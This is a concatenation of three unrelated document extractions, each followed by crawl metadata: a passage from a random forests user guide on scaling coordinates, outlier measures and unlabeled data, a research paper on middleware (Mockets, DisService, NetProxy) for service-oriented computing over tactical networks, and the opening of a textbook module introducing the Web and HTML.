.5*(prox(n,k)-prox(n,-)-prox(k,-)+prox(-,-)) \] is the matrix of inner products of the distances and is also positive definite symmetric. Let the eigenvalues of \(\text{cv}\) be \(\lambda(l)\) and the eigenvectors \(v_l(n)\). Then the vectors \[ x(n) = (\sqrt{\lambda(1)}v_1(n), \sqrt{\lambda(2)}v_2(n), ...) \] have squared distances between them equal to \(1 - \text{prox}(n,k)\). We refer to the values of \(\sqrt{\lambda(j)v_j(n)}\) as the \(j\)th scaling coordinate. In metric scaling, the idea is to approximate the vectors \(x(n)\) by the first few scaling coordinates. This is done in random forests by extracting the number \(m_{\text{dim}}\) of the largest eigenvalues and corresponding eigenvectors of the \(cv\) matrix. The two dimensional plots of the \(i\)th scaling coordinate vs. the \(j\)th often gives useful information about the data. The most useful is usually the graph of the 2nd vs. the 1st. We illustrate with three examples. The first is the graph of 2nd vs. 1st scaling coordinates for the liver data. The two arms of the class \#2 data in this picture correspond to the two clusters found and discussed above. The next example uses the microarray data. With 4682 variables, it is difficult to see how to cluster this data. Using proximities and the first two scaling coordinates gives this picture: ![Metric Scaling Microarray Data](image) Random forests misclassifies one case. This case is represented by the isolated point in the lower left hand corner of the plot. The third example is glass data with 214 cases, 9 variables and 6 classes. This data set has been extensively analyzed (see Pattern recognition and Neural Networkks-by B.D Ripley). Here is a plot of the 2nd vs. the 1st scaling coordinates: None of the analyses to data have picked up this interesting and revealing structure of the data--compare the plots in Ripley's book. **Outlier Location** Outliers are defined as cases having small proximities to all other cases. Since the data in some classes is more spread out than others, outlyingness is defined only with respect to other data in the same class as the given case. To define a measure of outlyingness, we first compute, for a case \( n \), the sum of the squares of \( \text{prox}(n,k) \) for all \( k \) in the same class as case \( n \). Take the inverse of this sum--it will be large if the proximities \( \text{prox}(n,k) \) from \( n \) to the other cases \( k \) in the same class are generally small. Denote this quantity by \( \text{out}(n) \). For all n in the same class, compute the median of the out(n), and then the mean absolute deviation from the median. Subtract the median from each out(n) and divide by the deviation to give a normalized measure of outlyingness. The values less than zero are set to zero. Generally, a value above 10 is reason to suspect the case of being outlying. Here is a graph of outlyingness for the microarray data. There are two possible outliers—one is the first case in class 1, the second is the first case in class 2. As a second example, we plot the outlyingness for the Pima Indians hepatitis data. This data set has 768 cases, 8 variables and 2 classes. It has been used often as an example in Machine Learning papers but has been suspected of containing a number of outliers. If 10 is used as a cutoff point, there are 12 cases suspected of being outliers. **Analyzing Unlabeled Data** Unlabeled data consists of N vectors \{x(n)\} in M dimensions. Using the iaddcl option in random forests, these vectors are assigned class label 1. Another set of N vectors is created and assigned class label 2. The second synthetic set is created by independent sampling from the one-dimensional margin distributions of the original data. For example, if the value of the mth coordinate of the original data for the nth case is x(m,n), then a case in the synthetic data is constructed as follows: its first coordinate is sampled at random from the N values x(1,n), its second coordinate is sampled at random from the N values $x(2,n)$, and so on. Thus the synthetic data set can be considered to have the distribution of $M$ independent variables where the distribution of the $m$th variable is the same as the univariate distribution of the $m$th variable in the original data. When this two class data is run through random forests a high misclassification rate—say over 40%, implies that there is not much dependence structure in the original data. That is, that its structure is largely that of $M$ independent variables—not a very interesting distribution. But if there is a strong dependence structure between the variables in the original data, the error rate will be low. In this situation, the output of random forests can be used to learn something about the structure of the data. The following is an example. *An Application to Chemical Spectra* Data graciously supplied by Merck consists of the first 468 spectral intensities in the spectrums of 764 compounds. The challenge presented by Merck was to find small cohesive groups of outlying cases in this data. Using the iaddcl option, there was excellent separation between the two classes, with an error rate of 0.5%, indicating strong dependencies in the original data. We looked at outliers and generated this plot. This plot gives no indication of outliers. But outliers must be fairly isolated to show up in the outlier display. To search for outlying groups scaling coordinates were computed. The plot of the 2nd vs. the 1st is below: This shows, first, that the spectra fall into two main clusters. There is a possibility of a small outlying group in the upper left hand corner. To get another picture, the 3rd scaling coordinate is plotted vs. the 1st. The group in question is now in the lower left hand corner and its separation from the body of the spectra has become more apparent.
{"Source-Url": "http://www.stat.berkeley.edu:80/~breiman/Using_random_forests_v3.00.pdf", "len_cl100k_base": 6899, "olmocr-version": "0.1.53", "pdf-total-pages": 28, "total-fallback-pages": 0, "total-input-tokens": 47311, "total-output-tokens": 8199, "length": "2e12", "weborganizer": {"__label__adult": 0.0003056526184082031, "__label__art_design": 0.0005078315734863281, "__label__crime_law": 0.00039839744567871094, "__label__education_jobs": 0.0015687942504882812, "__label__entertainment": 0.00011932849884033204, "__label__fashion_beauty": 0.0002238750457763672, "__label__finance_business": 0.0003447532653808594, "__label__food_dining": 0.0005016326904296875, "__label__games": 0.0006966590881347656, "__label__hardware": 0.0015163421630859375, "__label__health": 0.0007801055908203125, "__label__history": 0.0003113746643066406, "__label__home_hobbies": 0.0002474784851074219, "__label__industrial": 0.0006756782531738281, "__label__literature": 0.0003018379211425781, "__label__politics": 0.0003097057342529297, "__label__religion": 0.0005326271057128906, "__label__science_tech": 0.207275390625, "__label__social_life": 0.0001977682113647461, "__label__software": 0.050018310546875, "__label__software_dev": 0.73193359375, "__label__sports_fitness": 0.0003871917724609375, "__label__transportation": 0.0003314018249511719, "__label__travel": 0.00023484230041503904}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29578, 0.01065]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29578, 0.7863]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29578, 0.90373]], "google_gemma-3-12b-it_contains_pii": [[0, 1681, false], [1681, 3585, null], [3585, 5705, null], [5705, 7410, null], [7410, 8822, null], [8822, 10271, null], [10271, 12679, null], [12679, 14114, null], [14114, 15446, null], [15446, 17035, null], [17035, 18373, null], [18373, 18724, null], [18724, 19921, null], [19921, 19921, null], [19921, 20970, null], [20970, 21370, null], [21370, 22500, null], [22500, 22852, null], [22852, 24021, null], [24021, 24850, null], [24850, 25452, null], [25452, 26228, null], [26228, 27004, null], [27004, 27719, null], [27719, 29004, null], [29004, 29226, null], [29226, 29446, null], [29446, 29578, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1681, true], [1681, 3585, null], [3585, 5705, null], [5705, 7410, null], [7410, 8822, null], [8822, 10271, null], [10271, 12679, null], [12679, 14114, null], [14114, 15446, null], [15446, 17035, null], [17035, 18373, null], [18373, 18724, null], [18724, 19921, null], [19921, 19921, null], [19921, 20970, null], [20970, 21370, null], [21370, 22500, null], [22500, 22852, null], [22852, 24021, null], [24021, 24850, null], [24850, 25452, null], [25452, 26228, null], [26228, 27004, null], [27004, 27719, null], [27719, 29004, null], [29004, 29226, null], [29226, 29446, null], [29446, 29578, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29578, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29578, null]], "pdf_page_numbers": [[0, 1681, 1], [1681, 3585, 2], [3585, 5705, 3], [5705, 7410, 4], [7410, 8822, 5], [8822, 10271, 6], [10271, 12679, 7], [12679, 14114, 8], [14114, 15446, 9], [15446, 17035, 10], [17035, 18373, 11], [18373, 18724, 12], [18724, 19921, 13], [19921, 19921, 14], [19921, 20970, 15], [20970, 21370, 16], [21370, 22500, 17], [22500, 22852, 18], [22852, 24021, 19], [24021, 24850, 20], [24850, 25452, 21], [25452, 26228, 22], [26228, 27004, 23], [27004, 27719, 24], [27719, 29004, 25], [29004, 29226, 26], [29226, 29446, 27], [29446, 29578, 28]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29578, 0.0]]}
olmocr_science_pdfs
2024-12-12
2024-12-12
ecb4bfe2156749d822a9a6d3a58c44e73e39ae47
Agile Computing Middleware Support for Service-oriented Computing over Tactical Networks Niranjan Suri¹², Alessandro Morelli¹³, Jesse Kovach², Laurel Sadler², Robert Winkler² ¹Florida Institute for Human & Machine Cognition, Pensacola, FL, USA ²U.S. Army Research Laboratory, Adelphi, MD, USA ³University of Ferrara, Ferrara, Italy Abstract—Service-oriented architectures (SoAs) are a popular paradigm for enterprise and data center computing but normally do not perform well on tactical networks, which are often degraded in terms of bandwidth, reliability, latency, and connectivity. This paper presents the agile computing middleware and in particular a transparent network proxy and associated protocols that help address the impedance mismatch that occurs between SoAs and tactical and DIL (Disconnected, Intermittent, and Limited) networks. Keywords—Tactical Networks, Disconnected, Intermittent, and Limited Networks, Communications Middleware, Transport Protocols, Dissemination Services, Network Proxy I. INTRODUCTION Service-oriented architectures (SoAs) have evolved into a popular approach that supports rapid integration of multiple software components. SoAs provide well-defined interfaces and protocols to access their capabilities and hence offer many advantages including service reusability, composability using workflows, and rapid configuration and reconfiguration. Traditionally, SoAs have been deployed in enterprise and data center networks that are well connected with few constraints on bandwidth, latency, reliability, and availability. The popularity and success of SoAs in the enterprise environment has argued for their adoption in tactical network environments. However, tactical networks are typically wireless networks with little or no fixed infrastructure and are intermittently connected, bandwidth constrained, unreliable, and exhibit high and variable latencies. Tactical networks, as well as other Disconnected, Intermittent, and Limited (DIL) networks present many problems to the application and deployment of SoAs because SoAs were developed primarily for enterprise networks. SoAs typically use connection-oriented transport protocols such as TCP and encode messages in verbose, bandwidth intensive formats such as SOAP and XML. Additionally, TCP itself does not perform well on Tactical and DIL networks, further impacting the performance of SoAs. A detailed discussion of the network challenges and the requirements for SoAs to function effectively in tactical networks is discussed in [1]. This paper describes components of the agile computing middleware (ACM) that supports SoAs on tactical and DIL networks. The middleware addresses five primary challenges – resource and service discovery, transport protocols, disconnection support, resource allocation and coordination, and finally a transparent network proxy that helps to integrate legacy applications and systems. Given space limitations, this paper will focus primarily on the network proxy (NetProxy), which improves performance of legacy SoAs. Since NetProxy relies on other components in the middleware that provide transport services and disconnection support, those components are also briefly described. The experimental results presented in the evaluation section towards the end of the paper only focus on NetProxy. II. MIDDLEWARE OVERVIEW The agile computing middleware (ACM) has been motivated by the challenges posed by tactical and DIL networks and provides a comprehensive set of capabilities including network monitoring, data transport, data dissemination, resource and service discovery, transparent network proxy, and network visualization. Figure 1 shows the key components with a very short label identifying the purpose of each component. The components of this middleware have been primarily developed using C++ and ported to Linux, Win32, and in some cases, the Android environment. Wrappers are available for applications that are written in Java and C#. Furthermore, many of these components are available as open source under the GPLv3 license and currently hosted on GitHub [2]. The following sections describe Mockets, DisService, and the ACM NetProxy in more detail. Other components relevant to SoAs in tactical networks include the Group Manager component, which provides discovery services [3], and AgServe, which realizes a dynamic SoA with service migration [4]. ![Figure 1: Components of the Agile Computing Middleware](image-url) III. MOCKETS Mockets (for mobile sockets) is a transport protocol designed to replace TCP and UDP and targeted for DIL networks. Mockets itself can operate over UDP for IP networks, and can also operate over non-IP networks using packet adaptors. Mockets replaces the TCP congestion control... and reliable transmission algorithms with alternate, custom implementations that are designed for DIL networks. Numerous configurable options allow mockets to be easily adapted to a variety of network links and radios. Unlike TCP, mockets provides a message-oriented interface, which allows Mockets to distinguish between messages. Being able to identify message boundaries and messages allows Mockets to treat individual messages differently, which is not possible with a byte stream oriented model such as TCP. Mockets provides four different classes of service, which allows applications to choose options for reliability and sequencing for each message that they transmit. TCP only provides the equivalent of reliable and sequenced, which is the most expensive choice in terms of bandwidth and latency. Experience has shown that applications rarely need these semantics – but use them because those are the semantics provided by TCP. Many times, applications need sequencing but not reliability (e.g., audio or video streaming) and many times they need reliability but not sequencing. Other relevant capabilities provided by mockets include prioritization of messages, policy-based enforcement of bandwidth constraints, and message replacement. The last capability allows an application to flush and replace old messages with newer versions. Message replacement is particularly useful when applications generated repeated messages (e.g., status update messages). With TCP, these messages get enqueued when the network link goes down. Since TCP provides no feedback to the application, the application would continue to generate these periodic messages, which continue to get enqueued. When the network link is restored or is available again, all of these old messages would be sent unnecessarily. On the other hand, with Mockets, the application can assign a tag for each type of message, and then request that a new update replace previous messages with the same tag. That results in the most recent message being sent out when a connection is restored, which both reduces bandwidth utilization as well as the latency in message delivery. Experimental results that show the benefits of message replacement are provided in [5]. Another important capability offered by mockets is the ability to dynamically rebind an endpoint of an open connection in a manner that is transparent to the application. For example, if a node switches networks and as a consequence switches IP addresses, mockets could transparently rebind to the new IP address without any interruption of connection from the perspective of any of the applications. Unlike Mobile IP [6], mockets does not need a home node to forward traffic. Finally, mockets exports detailed statistics about the status of the network link, including queue sizes, reliability, throughput, and latency. All of these statistics can be utilized by other middleware layers or the application to adjust their behavior based on the performance of the underlying network. This is in contrast with TCP, which traditionally tries to isolate the application from the behavior of the underlying network. For the purposes of Service-oriented Computing over DIL networks, mockets has been integrated into NetProxy, which allows existing COTS applications to benefit from the performance improvements offered by Mockets. NetProxy is further described in section V. IV. DiSService DiSService is a peer-to-peer disruption tolerant dissemination service that provides many fundamental capabilities for DIL environments. DiSService supports store and forward delivery of data and caches data wherever possible in the network, thereby making it disruption tolerant and improving availability of data. The opportunistic listening capability of DiSService, described by patent [7], is of particular relevance to vehicular networks, as it addresses challenges such as temporary loss of connectivity due to tunnels and other “urban canyons.” DiSService also supports the notion of hierarchical groups to organize the information being disseminated and to be efficient about delivery of information. Subscriptions allow clients to express interest in particular groups. Information is published in the context of a group and is delivered to other nodes where applications have subscribed to those groups. DiSService, like mockets, provides a variety of classes of services. The one major difference is that mockets is a point-to-point communication protocol (like TCP) whereas DiSService is a point-to-multipoint communication protocol. Therefore, there could be many receivers for messages that are transmitted by one node. With DiSService, the class of service is specified by the subscriber (the receiver) for each group. For each group, a subscriber may specify whether sequencing is desired, whether messages should be reliable, and whether missing messages should be requested. Unlike mockets, which uses a Selective Acknowledgement (SAck) mechanism for reliability, DiSService uses a Negative Acknowledgement (NAck) mechanism for reliability. Therefore, it is up to each receiver to determine, based on the class of service desired, whether to request for missing pieces (fragments) of a message that has been published (and whether to request complete messages that might have been missed in their entirety). The disruption tolerance capability of DiSService provides a particularly useful foundation for Service-oriented architectures. Each service invocation may be embodied inside a DiSService message that is pushed by the client to the node hosting the service to be invoked. No end-to-end connectivity is required in this scenario for the service request message to reach the provider node. When the message is received, middleware on the provider node extracts the service invocation parameters from the message and invokes the service accordingly. When the result is obtained, it is in turn embodied in a new message and pushed by the provider node back to the client node. Figure 2 shows a typical scenario for service invocation via DiSService, where the invocation request and the reply may be forwarded through any number of intermediate nodes (also running DiSService). Workflows can be realized using an extension of the same mechanism, where intermediate results are embedded into messages and pushed between the nodes using DisService. Figure 2: Service Invocation over Disrupted Links with DisService V. NetProxy The ACM NetProxy is the component responsible for providing transparent integration between SoA systems and the middleware. Among its many features, the most notable include network protocol remapping, connection multiplexing, data compression, intelligent buffering, flow prioritization, and packets consolidation. The support for protocol remapping in NetProxy plays a particularly important role, as it allows forwarding (part of) the traffic generated by SoA applications over Mockets and DisService transparently. This is a key step towards enabling the reuse of SoA components in DIL networks, because it gives applications access to the features of ACM without making any changes to their source code. In addition, NetProxy supports two operational modes to fit better into different network configurations and to meet various user requirements. NetProxy works by intercepting packets generated by the applications before they are sent over the network. This gives NetProxy full control of all the different traffic flows going through it, without the need to change any network configuration or any parameter of the proxied nodes/applications. After their interception, NetProxy proceeds by analyzing those packets to extract useful pieces of information (source and/or destination IP address, transport protocol used, type of application/service, etc.). Other ACM components can provide further data, e.g. Mockets statistics can give an insight on the current network status, available bandwidth, and measured latency, which will enrich and complement the information extracted from the intercepted packets. Based on all of this information, on the status of the internal buffers, and on the configuration options specified, the decision making building block of the NetProxy will take the most appropriate actions to satisfy applications’ requirements under the constraints imposed by the available network resources. If NetProxy is configured to perform any type of protocol remapping, a second instance on the other end of the communication is necessary to apply the inverse remapping. This ensures complete application transparency, it avoids any compatibility issue, and it removes any dependency from other ACM components. The operational modes chosen for the two instances do not have to match. Supported operational modes, Host Mode (HM) and Gateway Mode (GM), differ in the way they intercept the traffic and in the role that the NetProxy assumes in the network. When operating in HM, as shown in Figure 3, a copy of the NetProxy is installed on any nodes that run SoA applications in need of proxy support. It follows that multiple instances might be running on different nodes of the network. This mode also requires the installation of a virtual network interface on those nodes, so that applications’ packets cannot reach the real network unless they go through the NetProxy. Conversely, when running in GM as shown in Figure 4, the NetProxy assumes it is installed on a single node of the network equipped with two network interfaces (labeled “internal” and “external”), from which it can proxy all the traffic coming in and going out from the network. The two modes have different advantages and liabilities. HM simply requires the installation of a piece of software on every node that runs applications needing to be proxied; however, each instance of the ACM component will only have a local view of the traffic and of the network conditions. On the other hand, GM requires NetProxy to be installed on a gateway node of the local network, which might not be possible because of the network architecture or authorization issues. However, running NetProxy on a gateway node is preferred in terms of having the best possible view of the traffic generated and the network status. It is entirely possible to have the equivalent of the NetProxy running on a router or wireless network device of some sort. For example, in a vehicular networking scenario, it is envisioned that the vehicle has a local area network (LAN), which then connects to a wireless router / device that provides off-vehicle connectivity. The NetProxy in GM would either run between the LAN and the wireless device, or could be directly integrated into the wireless device for complete transparency. Figure 3: NetProxy Running in Host Mode VI. EXPERIMENTAL RESULTS This section presents the results collected during two different experiments involving the NetProxy and other associated protocols. The first experiment is designed to reproduce the issues that SoA applications face when running in tactical networks and several tests were run in an emulated environment to collect the necessary data from it. The results of the second experiment, instead, come from a recent technical evaluation event: data represents a real use case and they were collected directly in the field, during the event. For our first experiment, we used an enhanced version of the Mobile Ad-hoc Network Emulator (MANE) [8], a tool designed to reproduce the characteristics of unreliable environments such as tactical networks, to set up the connectivity between the two nodes involved in the first experiment. Those nodes are part of the NOMADS testbed, which comprises 96 HP DL140 servers (Dual Xeon Dual Core CPUs at 3.06Ghz, with 4GB of RAM each) connected via a 100Mbps Ethernet LAN. MANE can manage bandwidth, latency, and reliability for both directions of each link, and thus it permits evaluating different systems and configurations in a reproducible, laboratory controlled environment. The reliability parameter in MANE is a complementary measure of the Packet Error Rate (PER): for instance, 90% reliability is equal to a PER of 10%. For the purposes of testing the performance of NetProxy, we had a client application on one node of the testbed generate an HTTP SOAP request, send it to a Web Server located on a second node, and finally wait for the response. To emulate different conditions of a tactical scenario, we kept the link bandwidth set to 1 Mbps in both directions while we ran several tests changing the reliability parameter: we used the values 87%, 90%, 93%, and 95%. The client application repeated each request 50 times under the same link conditions before we input the next reliability value in MANE. The whole experiment was repeated four times, changing the way client and server connected to each other: using TCP, using NetProxy to remap TCP over Mockets (we will refer to this configuration as “NP + Mockets” in the remainder of the paper), using NP + Mockets and enabling the lzma compression feature in NetProxy (NP + Mockets – LZMA), and finally using NP + Mockets and the zlib compression (NP + Mockets – ZLIB). Both instances of NetProxy were running in Host Mode. Figure 3 shows the results of the experiment described above. TCP shows the lowest throughput and remapping it over Mockets through NetProxy already produces a significant improvement in performance. Several reasons contribute to this result. First of all, Mockets handles packet loss much better than TCP, which attributes it entirely to network congestion thereby triggering congestion control when not necessary. Moreover, NetProxy multiplexes all the traffic directed to a single node onto the same connection, which keeps it open for consecutive requests that may come from various applications; on the contrary, single applications usually don’t keep their TCP connections open once a request has been served, which means that every new request has TCP to go through its slow-start phase. Part of the improvement is also due to the intelligent buffering of NetProxy combined with Mockets, which results in packets with larger payloads, thereby reducing the protocol overhead. However, enabling compression allowed us to achieve a much higher gain in the measured throughput. In fact, the verbosity of the HTTP and SOAP protocols permits compression algorithms to work very efficiently, sensibly reducing the amount of data that needs to be transferred. Despite the better compression ratio of the lzma algorithm compared to zlib, NP + Mockets – ZLIB showed the highest throughput. This result is due to the greater computational resources required by the lzma algorithm, at which point the computational time spent in compression exceeds the gains achieved in the network transmission time due to the slightly improved compression ratios. Figure 5: Performance Results of Service Invocation with NetProxy The second experiment consisted of a practical demonstration in the field. Four networks were involved in the experiment, namely networks NetA through NetD, and only NetA shared a satellite link to every other network. Therefore, direct connections between any of the networks from NetB through NetD were not possible, and so all communications between nodes in two of those networks had to go through NetA. All satellite links have a latency of 2 seconds, hence an RTT of 4 seconds, and a bandwidth of 32KBps (256 Kbps). NetProxy operating in Gateway Mode was installed on a dedicated Ubuntu 14.04 64-bit Linux machine in each of the four networks, and all incoming and outgoing traffic had to go through those nodes. This conferred on NetProxy complete observability of and control over the amount of traffic generated within the network and of the status of the satellite link. Tcpdump (http://www.tcpdump.org/) was used to capture all packets on both the internal and external network interfaces of the machines running NetProxy. Due to space limitations, only a subset of the results are presented. Two graphs show the effects of NetProxy on the number of packets generated and on the bandwidth usage, filtering out all traffic but that going from NetA to NetB. Statistical analysis of the other connections, in both directions, showed very similar results. On the X axis of the graphs is the time in seconds. Due to the long duration of the experiment (several hours) and the consequent overwhelming amount of data collected, only a small subset was selected for detailed presentation. This particular data sample is about 80 seconds long and starts at 680s after the beginning of the experiment. Figure 6 shows the number of packets sent every second by nodes of NetA to nodes of NetB (in red) against the number of packets actually generated every second by the NetProxy in NetA and transmitted over the satellite link to the NetProxy in NetB (in black). As can be seen clearly, the red bars are always significantly taller than the black ones, indicating a much lower resource consumption when using NetProxy. Actual packet counts indicated an improvement of 1.77x (in terms of reduction of the number of packets). Figure 7 shows a similar comparison – but measuring the bandwidth utilization (the unit of measurement is in bytes per second). Actual data analysis shows that the improvement (in terms of reduction of bandwidth) was approximately 2.44x. VII. SUMMARY AND FUTURE WORK This paper has described the agile computing middleware (ACM) and its application to supporting Service-oriented Architectures (SoAs) over tactical and DIL networks. NetProxy is the primary component that addresses the challenges of enabling legacy applications and SoAs to achieve better performance over tactical networks. NetProxy integrates the mockets transport protocol that replaces TCP and DisService for disruption-tolerant dissemination. Experimental results both in the laboratory and the field show the significant improvement in performance that can be achieved using this middleware capability. All of the components described in this paper are available via GPLv3 licensing from GitHub [2]. Future work in this area consists of further enhancements to SoA capabilities. In particular, the AgServe component is being updated to support dynamic service deployment and service migration by discovering and exploiting communication and computation resources in a dynamic tactical / DIL network environment. ACKNOWLEDGMENT This work is supported by the U.S. Army Research Laboratory under cooperative agreement W911NF-11-2-0095. REFERENCES
{"Source-Url": "https://de.unife.it/en/research/research-1/information-technology/computer-science/distributed-systems-group/papers/AgileComputingMiddlewareSupportforServiceorientedComputingoverTacticalNetworks.pdf/at_download/file", "len_cl100k_base": 4424, "olmocr-version": "0.1.50", "pdf-total-pages": 5, "total-fallback-pages": 0, "total-input-tokens": 15367, "total-output-tokens": 5294, "length": "2e12", "weborganizer": {"__label__adult": 0.00045013427734375, "__label__art_design": 0.00031566619873046875, "__label__crime_law": 0.0006384849548339844, "__label__education_jobs": 0.0005512237548828125, "__label__entertainment": 0.00016570091247558594, "__label__fashion_beauty": 0.00020873546600341797, "__label__finance_business": 0.0005779266357421875, "__label__food_dining": 0.0004024505615234375, "__label__games": 0.0006756782531738281, "__label__hardware": 0.005298614501953125, "__label__health": 0.0008392333984375, "__label__history": 0.0005083084106445312, "__label__home_hobbies": 8.958578109741211e-05, "__label__industrial": 0.00107574462890625, "__label__literature": 0.0003025531768798828, "__label__politics": 0.0004589557647705078, "__label__religion": 0.0004734992980957031, "__label__science_tech": 0.45947265625, "__label__social_life": 0.00011962652206420898, "__label__software": 0.041839599609375, "__label__software_dev": 0.481689453125, "__label__sports_fitness": 0.00048422813415527344, "__label__transportation": 0.0029144287109375, "__label__travel": 0.0003631114959716797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 25098, 0.01839]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 25098, 0.27782]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 25098, 0.91753]], "google_gemma-3-12b-it_contains_pii": [[0, 4780, false], [4780, 11073, null], [11073, 15593, null], [15593, 19866, null], [19866, 25098, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4780, true], [4780, 11073, null], [11073, 15593, null], [15593, 19866, null], [19866, 25098, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 25098, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 25098, null]], "pdf_page_numbers": [[0, 4780, 1], [4780, 11073, 2], [11073, 15593, 3], [15593, 19866, 4], [19866, 25098, 5]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 25098, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
e9e019ef8ba895e58361a3757335356569f49976
Module 1 Fundamentals of the World Wide Web The Goals of this Module - Understand basic Internet terms - Gain an overview of how web pages are built using HTML - Learn basic HTML tags and attributes - Investigate how different browsers interpret web pages - Understand how Dreamweaver 4 generates HTML It seems like the Internet is completely inescapable these days. Everywhere you turn, you see another advertisement for the latest web site or service or another story about someone making (or losing) millions of dollars on their hot Internet idea. For many people, using the Internet has become as common as using the telephone. In fact, entirely new terms have been coined that today seem completely familiar to most people, such as dot coms, surfing the Net, e-business—the list goes on and on. But how many people know what the Internet is really all about, such as how it works, how web pages are accessed, and how sounds and animations get created and placed so that we can get to them? At its heart, this book is all about how those things happen—from designing web pages, to creating and inserting pictures and graphics, to crafting sophisticated animations that move and react to our commands. By following along with the exercises in this book, you'll soon be creating dynamic web pages with original graphics, like the one shown in Figure 1-1. But to do those things, you first need to know how they work. Understanding the Web—Basic Internet Terminologies With the Internet seemingly everywhere, it’s hard to believe that the Net as we know it has been around less than ten years. While the basic structure of the Internet was created during the 1960s and 1970s, when scientists who needed a way to share their research created an interconnected network of computers, the modern Internet wasn’t born until the arrival of the first software program that allowed the average consumer to look at pages that included colors and pictures, and to move to another page by clicking a link with their mouse. A software program with those capabilities is known as a web browser. The first popular graphical web browser was created by a group of graduate students led by Marc Andreessen and Eric Bina at the University of Illinois. Called Mosaic for X, it was first released in 1993. Marc Andreessen went on to start Netscape Corporation, and his revised browser became the cornerstone of our modern online experience. The Netscape browser is still with us, of course, and it’s been joined by browser programs created by Microsoft (Internet Explorer) and by other browsers as well. All browsers have the same basic functions: to read a set of instructions, or code, that directs our computers to display text and pictures, enable us to get files from another computer (download), or send information to a computer Module 1: Fundamentals of the World Wide Web The exercises in this book will soon have you creating your own unique web pages for publication to the Web. (upload) and receive a response. While that seems pretty simple, in the short history of the Internet, the capabilities of browsers have expanded many times over, and today you not only can see a simple picture displayed at the top of a web page with some text below it, but also can track an airplane in flight, make reservations for a movie at the cinema, or chat with people all over the world. Yet even though the Internet has become incredibly sophisticated, the basic function of every web page you see is controlled by the code that is read by the browsers on our computers. What Is HTML? This basic code for the design of Web pages is called Hypertext Markup Language (HTML), and it is the foundation of every web page on the Web. The next section of this module takes a closer look at HTML. Notice what the code actually does, though. It gives directions to your computer to perform certain actions, such as display text or images, format the page in a particular layout, and insert objects that you can interact with. As a new web designer, this is one of the first lessons that you have to learn. Most of the actual work is done at the user’s (or client’s) computer. Something you’ll hear over and over again is that you need to design your pages for the user’s, or viewer’s, experience, and that includes considering the fact that their computers control how the page is displayed for them. Your job is to provide pages that neither get bogged down with long download times nor consume so much of the users’ computer resources that they leave your page out of frustration. And, of course, you need pages that attract viewers because the content is something they want to see. Thankfully, the technical challenge of designing quick-loading web pages is much easier to address when working with programs like Dreamweaver and Fireworks, because managing and optimizing your pages and files is the primary function of these programs. Getting Connected What happens after you log on to your Internet Service Provider (ISP), the company that provides your connection to the Internet? Your computer takes the first action when the browser that you’re using transmits a request to a remote computer to show you your initial web page. That remote computer—known as a server—is the place where all the files are stored that are necessary for your starting page to display properly. In fact, as you’ll see when HTML is discussed later in the chapter, web pages are not like printed pages at all. That is, the images and other information on the page are not one object, like a page in a magazine. Instead, the page contains code that tells the browser to retrieve and display those images, as shown in Figure 1-2. The browser’s job is to bring the images all together and display them for you, which is why your pages don’t always load all at once, but tend to display the text first and then the images as they are received from the server. Your home page and every other web page on the Internet have some basic things in common. The page is part of a web site—a collection of web pages, files, and links all associated with a particular domain name. These domain names are purchased by companies or individuals (such as www.amazon.com, www.yahoo.com, and www.msnbc.com), registered to nonprofit groups (such as www.pbs.org and www.splc.org), or assigned to government agencies or educational institutions (www.whitehouse.gov, www.stetson.edu, and www.firm.edu, for example) as a way to identify them as unique locations on Module 1: Fundamentals of the World Wide Web the World Wide Web (or simply the Web), the collection of servers that store the files of the web sites. The most common current domain suffixes (the three-letter code after the dot) are provided in Table 1-1. Seem confusing? It’s really not. Just as you have a unique address for your home, each web site needs a unique address so that it can be found. Depending on your browser, this address may be shown in the Location bar (Netscape) or the Address bar (Internet 